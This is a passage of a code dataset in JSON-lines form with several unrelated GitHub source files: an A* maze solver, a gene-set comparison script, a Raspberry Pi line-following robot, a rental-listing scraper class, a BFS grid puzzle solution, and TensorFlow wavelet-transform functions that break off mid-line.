which gitlab repos haven't I starred\n gitlab_starring_synchronization()","repo_name":"Trilarion/opensourcegames","sub_path":"code/gitlab_import.py","file_name":"gitlab_import.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"3"}
+{"seq_id":"4950536852","text":"import random\nfrom typing import List\n\nfrom a_star_terminal.a_star import a_star\nfrom a_star_terminal.utils import (Location, Cell, euclidean_distance,\n manhattan_distance, Node, path_to_node, chebyshev_distance)\n\n\nclass Maze:\n def __init__(self, rows: int, columns: int, start_location: Location, goal_location: Location):\n self._rows = rows\n self._columns = columns\n self._start: Location = start_location\n self._goal: Location = goal_location\n self._grid = [[Cell.EMPTY for _ in range(columns)]\n for _ in range(rows)]\n self._grid[start_location.row][start_location.column] = Cell.START\n self._grid[goal_location.row][goal_location.column] = Cell.GOAL\n self._fill_random()\n\n def successor(self, location: Location, allow_diagonal=False) -> List[Location]:\n \"\"\"\n Given a location, return all the possible state of the location\n :param allow_diagonal\n :param location\n :return: list of available location\n \"\"\"\n list_of_neighbor: List[Location] = []\n if location.column - 1 >= 0 and self._grid[location.row][location.column - 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row, location.column - 1))\n if location.row + 1 < self._rows and self._grid[location.row + 1][location.column] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row + 1, location.column))\n if location.column + 1 < self._columns and self._grid[location.row][location.column + 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row, location.column + 1))\n if location.row - 1 >= 0 and self._grid[location.row - 1][location.column] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row - 1, location.column))\n # Check for diagonal neighbor if possible\n if not allow_diagonal:\n return list_of_neighbor\n # top-right\n if (location.column - 1 >= 0 and location.row + 1 < self._rows) and self._grid[\n location.row + 1][location.column - 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row + 1, location.column - 1))\n # bottom-right\n if (location.column + 1 < self._columns and location.row + 1 < self._rows) and self._grid[\n location.row + 1][location.column + 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row + 1, location.column + 1))\n # bottom - left\n if (location.column + 1 < self._columns and location.row - 1 >= 0) and self._grid[\n location.row - 1][location.column + 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row - 1, location.column + 1))\n # top-left\n if (location.column - 1 >= 0 and location.row - 1 >= 0) and self._grid[\n location.row - 1][location.column - 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row - 1, location.column - 1))\n return list_of_neighbor\n\n def goal_check(self, location: Location) -> bool:\n \"\"\"\n Check if the location is the same as goal\n :param location\n :return: bool\n \"\"\"\n return self._goal == location\n\n def mark(self, paths: List[Location]):\n \"\"\"\n Mark all the location in path as PATH\n :param paths: List of location\n \"\"\"\n for location in paths:\n self._grid[location.row][location.column] = Cell.PATH\n self._grid[self._start.row][self._start.column] = Cell.START\n self._grid[self._goal.row][self._goal.column] = Cell.GOAL\n\n def __str__(self):\n \"\"\"\n represent maze in the terminal\n :return: maze representation: str\n \"\"\"\n output = \"\"\n for row in self._grid:\n output += \"\".join([cell.value for cell in row]) + \"\\n\"\n return output\n\n def _fill_random(self):\n \"\"\"\n Create random block, each cell have 0.2 chance to be BLOCK\n \"\"\"\n for i, row in enumerate(self._grid):\n for j, value in enumerate(row):\n if value == Cell.EMPTY and random.uniform(0, 1) < 0.2:\n self._grid[i][j] = Cell.BLOCK\n\n\nif __name__ == '__main__':\n start = Location(0, 0)\n goal = Location(9, 9)\n euclidean_heuristic = euclidean_distance(goal)\n manhattan_heuristic = manhattan_distance(goal)\n chebyshev_heuristic = chebyshev_distance(goal)\n maze: Maze = Maze(10, 10, start, goal)\n solution: Node = a_star(start, maze.goal_check, maze.successor, chebyshev_heuristic, True)\n print(maze)\n if not solution:\n print(\"No solution is found\")\n else:\n path = path_to_node(solution)\n maze.mark(path)\n print(maze)\n","repo_name":"Ahmed-Alsardi/a-star-algorithms","sub_path":"a_star_terminal/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7190758093","text":"from GLOBAL_VAR import *\nfrom METHOD_VAR import *\n\n### Test number of ts-eGenes\nTested_Method_N = {}\nfor geneGroup in ['topGene4','topGene6', 'topGene5', 'topGene30']:\n Tested_Method_N[geneGroup] = []\n for tis in range(1,23):\n tp = pd.read_csv('%s/%s_%s_group%d.txt' % (pairdir, LMfn, geneGroup, tis), sep='\\t')\n Tested_Method_N[geneGroup].append(len(tp))\n\n\n# spMF\n\nold_pairdir = '/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/downstream/pairSets/'\n\nr2 = '1'\nFDR = 0.05\n\nFMfn = 'SparseMF_coph_%s_topPair_K30_a11_l110' % prefix.replace(r2, '0.2')\nLMfn= '%s%s_Loadings_beta_BH_corrected_alpha%s' % (FMfn, LDprefix, str(FDR))\n\nspMF_N = {}\n\nfor geneGroup in ['topGene5', 'topGene22']:\n spMF_N[geneGroup] = []\n for k in range(1, 23):\n tp = pd.read_csv('%s/%s_%s_group%d.txt' % (old_pairdir, LMfn, geneGroup, k), sep='\\t')\n spMF_N[geneGroup].append(len(tp))\n \n \nx = Tested_Method_N['topGene4']\ny = spMF_N['topGene5']\nprint(np.mean(x), np.mean(y))\n\n\nx = Tested_Method_N['topGene30']\ny = spMF_N['topGene22']\nprint(np.mean(x), np.mean(y))\n\n","repo_name":"heyuan7676/ts_eQTLs","sub_path":"Extended_Methods/Downstream_analysis/scripts/6_GSEA_Genesets_compare.py","file_name":"6_GSEA_Genesets_compare.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"40726414959","text":"import cv2\nimport numpy as np\nimport RPi.GPIO as GPIO\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 160)\ncap.set(4, 120)\n\nin1 = 4\nin2 = 17\nin3 = 27\nin4 = 22\nen1 = 23\nen2 = 24\n\nGPIO.setwarnings(False) # Disable GPIO warnings\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(en1, GPIO.OUT)\nGPIO.setup(en2, GPIO.OUT)\nGPIO.setup(in1, GPIO.OUT)\nGPIO.setup(in2, GPIO.OUT)\nGPIO.setup(in3, GPIO.OUT)\nGPIO.setup(in4, GPIO.OUT)\np1 = GPIO.PWM(en1, 150)\np2 = GPIO.PWM(en2, 150)\np1.start(40)\np2.start(40)\nGPIO.output(in1, GPIO.LOW)\nGPIO.output(in2, GPIO.LOW)\nGPIO.output(in3, GPIO.LOW)\nGPIO.output(in4, GPIO.LOW)\n\nprevious_error = 0\n\nwhile True:\n ret, frame = cap.read()\n\n # Convert frame to HSV color space\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # Define the lower and upper bounds for the black line color\n lower_black = np.array([0, 0, 0], dtype=np.uint8)\n upper_black = np.array([180, 255, 50], dtype=np.uint8)\n\n # Apply color thresholding to isolate the black line\n mask = cv2.inRange(hsv, lower_black, upper_black)\n\n # Apply morphology operations to enhance the black line detection\n kernel = np.ones((3, 3), np.uint8)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n if len(contours) > 0:\n c = max(contours, key=cv2.contourArea)\n M = cv2.moments(c)\n\n if M[\"m00\"] != 0:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n print(\"CX: \" + str(cx) + \" CY: \" + str(cy))\n\n # Calculate the error as the difference between the current x-coordinate and the desired center (80 in this case)\n error = cx - 80\n\n # Adjust the scaling factor as per your requirements\n proportional_control = 0\n derivative_control = 1\n \n previous_error = 1\n integral_term = 2\n\n # Calculate the change in error\n delta_error = error - previous_error\n\n # Calculate the steering command based on the error and proportional control\n steering = int(proportional_control * error + derivative_control * delta_error)\n\n # Limit the steering command within a certain range\n max_steering = 1\n steering = max(-max_steering, min(steering, max_steering))\n\n # Set the motor speeds and directions\n if steering < 0:\n print(\"Turn Right\")\n GPIO.output(in1, GPIO.LOW)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.LOW)\n GPIO.output(in4, GPIO.HIGH)\n p1.ChangeDutyCycle(100)\n p2.ChangeDutyCycle(1 - abs(steering))\n elif steering > 0:\n print(\"Turn Left\")\n GPIO.output(in1, GPIO.HIGH)\n GPIO.output(in2, GPIO.LOW)\n GPIO.output(in3, GPIO.HIGH)\n GPIO.output(in4, GPIO.LOW)\n p1.ChangeDutyCycle(1 - abs(steering))\n p2.ChangeDutyCycle(100)\n else:\n print(\"On Track!\")\n GPIO.output(in1, GPIO.LOW)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.LOW)\n GPIO.output(in4, GPIO.HIGH)\n p1.ChangeDutyCycle(80)\n p2.ChangeDutyCycle(80)\n\n # Update the previous error\n previous_error = error\n\n # Draw a white dot at the center of the line\n cv2.circle(frame, (cx, cy), 5, (255, 255, 255), -1)\n\n else:\n print(\"I don't see the line\")\n GPIO.output(in1, GPIO.HIGH)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.HIGH)\n GPIO.output(in4, GPIO.HIGH)\n p1.ChangeDutyCycle(0)\n p2.ChangeDutyCycle(0)\n\n cv2.drawContours(frame, c, -1, (0, 255, 0), 1)\n\n cv2.imshow(\"Mask\", mask)\n cv2.imshow(\"Frame\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n GPIO.output(in1, GPIO.HIGH)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.HIGH)\n GPIO.output(in4, GPIO.HIGH)\n p1.stop()\n p2.stop()\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"akimaziz/RaspberiPi-OS-OpenCV-setup","sub_path":"hakimipi.py","file_name":"hakimipi.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19998819023","text":"from ..properties.UniversityRealtyProperty import UniversityRealtyProperty\nfrom BaseCompanyExcel import BaseCompanyExcel\nclass UniversityRealty(BaseCompanyExcel):\n\tname ='University Realty'\n\tcity ='Austin'\n\tstate ='TX'\n\n\tdef setup(self):\n\t\tself.set_col_headers( [\n\t\t\t\t\t\t\t('university_zip_code', 'zip'),\n\t\t\t\t\t\t\t('property', 'property'), \n\t\t\t\t\t\t\t('address', ''), \n\t\t\t\t\t\t\t('university_unit', ''), \n\t\t\t\t\t\t\t('monthly_rent', ''),\n\t\t\t\t\t\t\t('size', ''), \n\t\t\t\t\t\t\t('tenant_phone', ''),\n\t\t\t\t\t\t\t('available', ''),\n\t\t\t\t\t\t\t('end' , ''),\n\t\t\t\t\t\t\t('description', ''),\n\t\t\t\t\t\t ], 'default')\n\t\t# self.set_exempted_rows( [\n\t\t# \t\t\t\t\t'Houses / Multiplex',\n\t\t# \t\t\t\t\t'Rooms Rooms' ,\n\t\t# \t\t\t\t\t'Efficiencies Effs',\n\t\t# \t\t\t\t\t'1 Bedrooms 1 Bd',\n\t\t# \t\t\t\t\t'1 Bedroom 1-Bd',\n\t\t# \t\t\t\t\t'2 bedroom 2-Bd',\n\t\t# \t\t\t\t\t'Condos/Apts',\n\t\t# \t\t\t\t\t'Condos/Apts 2 Bd',\n\t\t# \t\t\t\t\t'3 Bedroom 3Bd',\n\t\t# \t\t\t\t\t'3 Bedroom 3-Bds',\n\t\t# \t\t\t\t\t'3 Bedroom 3-Bd',\n\t\t# \t\t\t\t\t'4-7 Bedroom 4-7 Bds'\n\t\t# \t\t\t\t\t], 'default', 5)\n\t\n\n\tdef new_property(self, property_data):\n\t\tprop =UniversityRealtyProperty(property_data, self)\t\n\t\treturn prop\n","repo_name":"joshuabuga/scrapper","sub_path":"scraper/src/companies/UniversityRealty.py","file_name":"UniversityRealty.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43798088373","text":"from collections import deque\ndef bfs(x, y):\n visited = [[False] * m for _ in range(n)]\n queue = deque([(x, y, 0)])\n visited[x][y] = True\n dx = [-1, -1, -1, 0, 1, 0, 1, 1]\n dy = [-1, 0, 1, 1, 1, -1, 0, -1]\n while queue:\n x, y, distance = queue.popleft()\n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m and not visited[nx][ny]:\n if lst[nx][ny] == 0:\n queue.append((nx, ny, distance+1))\n visited[nx][ny] = True\n else:\n return distance + 1\n\nn, m = map(int, input().split())\nlst = [[int(x) for x in input().split()] for _ in range(n)]\nres = 0\nqueue = deque()\nfor i in range(n):\n for j in range(m):\n if lst[i][j] == 0:\n res = max(res, bfs(i, j))\nprint(res)","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week05_230209/17086_아기_상어_2/17086_박현준.py","file_name":"17086_박현준.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"5944002189","text":"import collections.abc\nimport itertools\nimport warnings\n\nimport pywt\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_mri.python.ops import array_ops\nfrom tensorflow_mri.python.util import api_util\n\n\n@api_util.export(\"signal.dwt\")\ndef dwt(data, wavelet, mode='symmetric', axes=None):\n \"\"\"Single-level N-dimensional discrete wavelet transform (DWT).\n\n Args:\n data: A `tf.Tensor` of real or complex type.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n axes: A `list` of `int`. Axes over which to compute the DWT. Repeated\n elements mean the DWT will be performed multiple times along these axes.\n A value of `None` (the default) selects all axes.\n\n Returns:\n A `dict` where key specifies the transform type on each dimension and value\n is an N-dimensional `tf.Tensor` containing the corresponding coefficients.\n\n For example, for a 2D case the result will have keys `'aa'` (approximation\n on 1st dimension, approximation on 2nd dimension), `'ad'` (approximation on\n 1st dimension, detail on 2nd dimension), `'da'` (detail on 1st dimension,\n approximation on 2nd dimension), and `'dd'` (detail on 1st dimension, detail\n on 2nd dimension).\n\n For user-specified `axes`, the order of the characters in the\n dictionary keys map to the specified `axes`.\n\n Raises:\n ValueError: If any of the inputs is not valid.\n\n .. _pywt.Wavelet: https://pywavelets.readthedocs.io/en/latest/ref/wavelets.html#pywt.Wavelet\n .. _tf.pad: https://www.tensorflow.org/api_docs/python/tf/pad\n \"\"\"\n data = tf.convert_to_tensor(data)\n rank = data.shape.rank\n\n # Handle complex numbers.\n if data.dtype.is_complex:\n real = dwt(tf.math.real(data), wavelet, mode, axes)\n imag = dwt(tf.math.imag(data), wavelet, mode, axes)\n return {k: tf.dtypes.complex(real[k], imag[k]) for k in real.keys()}\n\n # Canonicalize axes. If None, compute decomposition along all axes.\n if axes is None:\n axes = range(rank)\n axes = [ax + rank if ax < 0 else ax for ax in axes]\n\n # Get padding mode for each axis.\n wavelets = _wavelets_per_axis(wavelet, axes)\n modes = _modes_per_axis(mode, axes)\n\n coeffs = [('', data)]\n for ax, wav, mod in zip(axes, wavelets, modes):\n new_coeffs = []\n for subband, x in coeffs:\n c_a, c_d = _dwt_along_axis(x, wav, mod, ax)\n new_coeffs.extend([(subband + 'a', c_a),\n (subband + 'd', c_d)])\n coeffs = new_coeffs\n return dict(coeffs)\n\n\n@api_util.export(\"signal.idwt\")\ndef idwt(coeffs, wavelet, mode='symmetric', axes=None):\n \"\"\"Single-level N-dimensional inverse discrete wavelet transform (IDWT).\n\n Args:\n coeffs: A `dict` with the same structure as the output of\n `tfmri.signal.dwt`. Missing or `None` items will be treated as zeros.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n axes: A `list` of `int`. Axes over which to compute the DWT. Repeated\n elements mean the DWT will be performed multiple times along these axes.\n A value of `None` (the default) selects all axes.\n\n Returns:\n A `tf.Tensor` containing the reconstructed signal.\n\n Raises:\n ValueError: If any of the inputs is not valid.\n\n .. _pywt.Wavelet: https://pywavelets.readthedocs.io/en/latest/ref/wavelets.html#pywt.Wavelet\n .. _tf.pad: https://www.tensorflow.org/api_docs/python/tf/pad\n \"\"\"\n # Drop the keys where value is None.\n coeffs = {k: v for k, v in coeffs.items() if v is not None}\n\n # Check key combinations.\n coeffs = _fix_coeffs(coeffs)\n\n # Handle complex numbers.\n if any(v.dtype.is_complex for v in coeffs.values()):\n real = {k: tf.math.real(v) for k, v in coeffs.items()}\n imag = {k: tf.math.imag(v) for k, v in coeffs.items()}\n return tf.dtypes.complex(idwt(real, wavelet, mode, axes),\n idwt(imag, wavelet, mode, axes))\n\n # key length matches the number of axes transformed\n rank_transform = max(len(key) for key in coeffs.keys())\n\n try:\n coeff_shapes = (v.shape for k, v in coeffs.items()\n if v is not None and len(k) == rank_transform)\n coeff_shape = next(coeff_shapes)\n except StopIteration:\n raise ValueError(\"`coeffs` must contain at least one non-null wavelet band\") # pylint: disable=raise-missing-from\n if any(s != coeff_shape for s in coeff_shapes):\n raise ValueError(\"`coeffs` must all be of equal size (or None)\")\n\n if axes is None:\n axes = range(rank_transform)\n ndim = rank_transform\n else:\n ndim = len(coeff_shape)\n axes = [a + ndim if a < 0 else a for a in axes]\n\n modes = _modes_per_axis(mode, axes)\n wavelets = _wavelets_per_axis(wavelet, axes)\n for key_length, (ax, wav, mod) in reversed(\n list(enumerate(zip(axes, wavelets, modes)))):\n if ax < 0 or ax >= ndim:\n raise ValueError(\"Axis greater than data dimensions\")\n\n new_coeffs = {}\n new_keys = [''.join(coef)\n for coef in itertools.product('ad', repeat=key_length)]\n\n for key in new_keys:\n lo = coeffs.get(key + 'a', None)\n hi = coeffs.get(key + 'd', None)\n new_coeffs[key] = _idwt_along_axis(lo, hi, wav, mod, ax)\n coeffs = new_coeffs\n\n return coeffs['']\n\n\n@api_util.export(\"signal.wavedec\")\ndef wavedec(data, wavelet, mode='symmetric', level=None, axes=None):\n \"\"\"Multilevel N-dimensional discrete wavelet transform (wavelet decomposition).\n\n Args:\n data: A `tf.Tensor` of real or complex type.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n level: An `int` >= 0. The decomposition level. If `None` (default),\n the maximum useful level of decomposition will be used (see\n `tfmri.signal.max_wavelet_level`).\n axes: A `list` of `int`. Axes over which to compute the DWT. Axes may not\n be repeated. A value of `None` (the default) selects all axes.\n\n Returns:\n A `list` of coefficients such as\n `[approx, {details_level_n}, ..., {details_level_1}]`. The first element\n in the list contains the approximation coefficients at level `n`. The\n remaining elements contain the detail coefficients, listed in descending\n order of decomposition level. Each ``details_level_i`` element is a\n `dict` containing detail coefficients at level ``i`` of the decomposition.\n As a concrete example, a 3D decomposition would have the following set of\n keys in each `details_level_i` `dict`:\n `{'aad', 'ada', 'daa', 'add', 'dad', 'dda', 'ddd'}, where the order of the\n characters in each key map to the specified `axes`.\n\n Examples:\n >>> import tensorflow as tf\n >>> import tensorflow_mri as tfmri\n >>> coeffs = tfmri.signal.wavedec(tf.ones((4, 4)), 'db1')\n >>> # Levels:\n >>> len(coeffs)-1\n 2\n >>> tfmri.signal.waverec(coeffs, 'db1')\n \n\n .. _pywt.Wavelet: https://pywavelets.readthedocs.io/en/latest/ref/wavelets.html#pywt.Wavelet\n .. _tf.pad: https://www.tensorflow.org/api_docs/python/tf/pad\n \"\"\"\n data = tf.convert_to_tensor(data)\n axes, axes_shapes, rank_transform = _prep_axes_wavedec(data.shape, axes)\n wavelets = _wavelets_per_axis(wavelet, axes)\n dec_lengths = [w.dec_len for w in wavelets]\n\n level = _check_level(axes_shapes, dec_lengths, level)\n\n coeffs_list = []\n\n a = data\n for _ in range(level):\n coeffs = dwt(a, wavelet, mode, axes)\n a = coeffs.pop('a' * rank_transform)\n coeffs_list.append(coeffs)\n\n coeffs_list.append(a)\n coeffs_list.reverse()\n\n return coeffs_list\n\n\n@api_util.export(\"signal.waverec\")\ndef waverec(coeffs, wavelet, mode='symmetric', axes=None):\n \"\"\"Multilevel N-dimensional inverse discrete wavelet transform (wavelet reconstruction).\n\n Args:\n coeffs: A `list` with the same structure as the output of\n `tfmri.signal.wavedec`.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n axes: A `list` of `int`. Axes over which to compute the IDWT. Axes may not\n be repeated. A value of `None` (the default) selects all axes.\n\n Returns:\n A `tf.Tensor` containing the reconstructed signal.\n\n Examples:\n >>> import tensorflow as tf\n >>> import tensorflow_mri as tfmri\n >>> coeffs = tfmri.signal.wavedec(tf.ones((4, 4)), 'db1')\n >>> # Levels:\n >>> len(coeffs)-1\n 2\n >>> tfmri.signal.waverec(coeffs, 'db1')\n \n\n Raises:\n ValueError: If passed invalid input values.\n \"\"\"\n if len(coeffs) < 1:\n raise ValueError(\n \"Coefficient list too short (minimum 1 array required).\")\n\n a, ds = coeffs[0], coeffs[1:]\n\n # this dictionary check must be prior to the call to _fix_coeffs\n if len(ds) > 0 and not all(isinstance(d, dict) for d in ds):\n raise ValueError(\n f\"Unexpected detail coefficient type: {type(ds[0])}. Detail \"\n f\"coefficients must be a dict of arrays as returned by wavedec.\")\n\n # Raise error for invalid key combinations\n ds = list(map(_fix_coeffs, ds))\n\n if not ds:\n # level 0 transform (just returns the approximation coefficients)\n return coeffs[0]\n if a is None and not any(ds):\n raise ValueError(\n \"At least one coefficient must contain a valid value.\")\n\n coeff_ndims = []\n if a is not None:\n a = np.asarray(a)\n coeff_ndims.append(a.ndim)\n for d in ds:\n coeff_ndims += [v.ndim for k, v in d.items()]\n\n # test that all coefficients have a matching number of dimensions\n unique_coeff_ndims = np.unique(coeff_ndims)\n if len(unique_coeff_ndims) == 1:\n ndim = unique_coeff_ndims[0]\n else:\n raise ValueError(\n \"All coefficients must have a matching number of dimensions\")\n\n if np.isscalar(axes):\n axes = (axes, )\n if axes is None:\n axes = range(ndim)\n else:\n axes = tuple(axes)\n if len(axes) != len(set(axes)):\n raise ValueError(\"The axes passed to waverecn must be unique.\")\n rank_transform = len(axes)\n\n for idx, d in enumerate(ds):\n if a is None and not d:\n continue\n # The following if statement handles the case where the approximation\n # coefficient returned at the previous level may exceed the size of the\n # stored detail coefficients by 1 on any given axis.\n if idx > 0:\n a = _match_coeff_dims(a, d)\n d['a' * rank_transform] = a\n a = idwt(d, wavelet, mode, axes)\n\n return a\n\n\ndef _dwt_along_axis(x, wavelet, mode, axis): # pylint: disable=missing-param-doc\n \"\"\"Computes the DWT along a single axis.\"\"\"\n # Move axis `axis` to last position.\n perm = list(range(x.shape.rank))\n perm = [ax for ax in perm if ax != axis] + [axis]\n x = tf.transpose(x, perm)\n\n # Do padding.\n pad_length = len(wavelet) - 1\n paddings = [[0, 0]] * (x.shape.rank - 1) + [[pad_length, pad_length]]\n x = tf.pad(x, paddings, mode=mode) # pylint: disable=unexpected-keyword-arg,no-value-for-parameter\n\n # Add channel dimension.\n x = tf.expand_dims(x, axis=-1)\n\n # conv1d requires at least one batch dimension, so add a dummy one.\n scalar_batch = False\n if x.shape.rank == 2:\n scalar_batch = True\n x = tf.expand_dims(x, axis=0)\n\n # Shift the input tensor by 1. We take care to retain the static shape of the\n # sliced tensor.\n begin = [0] * x.shape.rank\n begin[-2] = 1\n size = tf.shape(x) - begin\n shape = x.shape.as_list()\n if shape[-2] is not None:\n shape[-2] -= 1\n x = tf.slice(x, begin, size)\n x = tf.ensure_shape(x, shape)\n\n # Get filters.\n f_lo = tf.reverse(tf.reshape(wavelet.dec_lo, [-1, 1, 1]), [0])\n f_hi = tf.reverse(tf.reshape(wavelet.dec_hi, [-1, 1, 1]), [0])\n f_lo = tf.cast(f_lo, x.dtype)\n f_hi = tf.cast(f_hi, x.dtype)\n\n # Compute approximation and detail coeffs.\n a = tf.nn.conv1d(x, f_lo, 2, 'VALID')\n d = tf.nn.conv1d(x, f_hi, 2, 'VALID')\n\n # Remove dummy scalar dimension, if necessary.\n if scalar_batch:\n a = tf.squeeze(a, axis=0)\n d = tf.squeeze(d, axis=0)\n\n # Remove channel dimension.\n a = tf.squeeze(a, axis=-1)\n d = tf.squeeze(d, axis=-1)\n\n # Invert the original permutation. We use NumPy intentionally here as we\n # want to do this computation statically.\n inv_perm = np.argsort(perm).tolist()\n a = tf.transpose(a, inv_perm)\n d = tf.transpose(d, inv_perm)\n\n return a, d\n\n\ndef _idwt_along_axis(a, d, wavelet, mode, axis): # pylint: disable=missing-param-doc,unused-argument\n \"\"\"Computes the IDWT along a single axis.\"\"\"\n # Move axis `axis` to last position.\n perm = list(range(a.shape.rank))\n perm = [ax for ax in perm if ax != axis] + [axis]\n a = tf.transpose(a, perm)\n d = tf.transpose(d, perm)\n\n # Add channel dimension.\n a = tf.expand_dims(a, axis=-1)\n d = tf.expand_dims(d, axis=-1)\n\n # conv1d requires at least one batch dimension, so add a dummy one.\n scalar_batch = False\n if a.shape.rank == 2:\n scalar_batch = True\n a = tf.expand_dims(a, axis=0)\n d = tf.expand_dims(d, axis=0)\n\n # Get filters.\n f_lo = tf.reverse(tf.reshape(wavelet.rec_lo, [-1, 1, 1]), [0])\n f_hi = tf.reverse(tf.reshape(wavelet.rec_hi, [-1, 1, 1]), [0])\n f_lo = tf.cast(f_lo, a.dtype)\n f_hi = tf.cast(f_hi, d.dtype)\n\n # Define length.\n input_length = 2 * tf.shape(a)[-2]\n filter_length = tf.shape(f_lo)[-3]\n output_length = input_length - filter_length + 2\n\n # Dyadic upsampling.\n a = _dyadic_upsampling(a, axis=-2, indices='even')\n d = _dyadic_upsampling(d, axis=-2, indices='even')\n\n # Do extra padding to implement \"FULL\" convolution mode.\n left_padding = len(wavelet.rec_lo) - 1\n right_padding = len(wavelet.rec_hi) - 1\n paddings = [[0, 0]] * a.shape.rank\n paddings[-2] = [left_padding, right_padding]\n a = tf.pad(a, paddings) # pylint: disable=no-value-for-parameter\n d = tf.pad(d, paddings) # pylint: disable=no-value-for-parameter\n\n # Do convolution.\n a = tf.nn.conv1d(a, f_lo, 1, 'VALID')\n d = tf.nn.conv1d(d, f_hi, 1, 'VALID')\n\n # Keep only part of the output.\n current_length = tf.shape(a)[-2]\n begin = tf.scatter_nd(\n [[tf.rank(a) - 2]], [(current_length - output_length) // 2], [tf.rank(a)])\n size = tf.tensor_scatter_nd_update(\n tf.shape(a), [[tf.rank(a) - 2]], [output_length])\n a = tf.slice(a, begin, size)\n d = tf.slice(d, begin, size)\n\n # Reconstructed signal.\n x = a + d\n\n # Remove dummy scalar dimension, if necessary.\n if scalar_batch:\n x = tf.squeeze(x, axis=0)\n\n # Remove channel dimension.\n x = tf.squeeze(x, axis=-1)\n\n # Invert the original permutation. We use NumPy intentionally here as we\n # want to do this computation statically.\n inv_perm = np.argsort(perm).tolist()\n x = tf.transpose(x, inv_perm)\n\n return x\n\n\ndef _dyadic_upsampling(x, axis=-1, indices='odd'):\n \"\"\"Performs dyadic upsampling along an axis.\n\n Args:\n x: A `tf.Tensor`.\n axis: An `int`. along which to upsample.\n indices: A `str`. Must be `'odd'` or `'even'`. Controls whether to upsample\n odd- or even-indexed elements.\n\n Returns:\n The upsampled `tf.Tensor`.\n \"\"\"\n # Canonicalize axis.\n axis = axis + x.shape.rank if axis < 0 else axis\n\n # Compute output shape.\n output_shape = tf.tensor_scatter_nd_update(\n tf.shape(x), [[axis]], [2 * tf.shape(x)[axis]])\n\n zeros = tf.zeros_like(x)\n x = tf.stack([x, zeros], axis=(axis + 1))\n\n # Reshape to correct shape.\n x = tf.reshape(x, output_shape)\n if indices == 'even':\n begin = tf.zeros([tf.rank(x)], dtype=tf.int32)\n size = tf.tensor_scatter_nd_update(\n tf.shape(x), [[axis]], [tf.shape(x)[axis] - 1])\n x = tf.slice(x, begin, size)\n\n elif indices == 'odd':\n paddings = tf.zeros([tf.rank(x), 2], dtype=tf.int32)\n paddings = tf.tensor_scatter_nd_update(paddings, [[axis, 0]], [1])\n x = tf.pad(x, paddings) # pylint: disable=no-value-for-parameter\n\n return x\n\n\ndef _wavelets_per_axis(wavelet, axes):\n \"\"\"Initialize Wavelets for each axis to be transformed.\n\n Args:\n wavelet: A `str` or `Wavelet` or an iterable of `str` or `Wavelet`. If a\n single wavelet is provided, it will used for all axes. Otherwise one\n wavelet per axis must be provided.\n axes: The `list` of axes to be transformed.\n\n Returns:\n A `list` of wavelets equal in length to `axes`.\n\n Raises:\n ValueError: If `wavelet` is not valid for the given `axes`.\n \"\"\"\n axes = tuple(axes)\n if isinstance(wavelet, (str, pywt.Wavelet)):\n # Same wavelet on all axes.\n wavelets = [_as_wavelet(wavelet)] * len(axes)\n elif isinstance(wavelet, collections.abc.Iterable):\n # (potentially) unique wavelet per axis (e.g. for dual-tree DWT)\n if len(wavelet) == 1:\n wavelets = 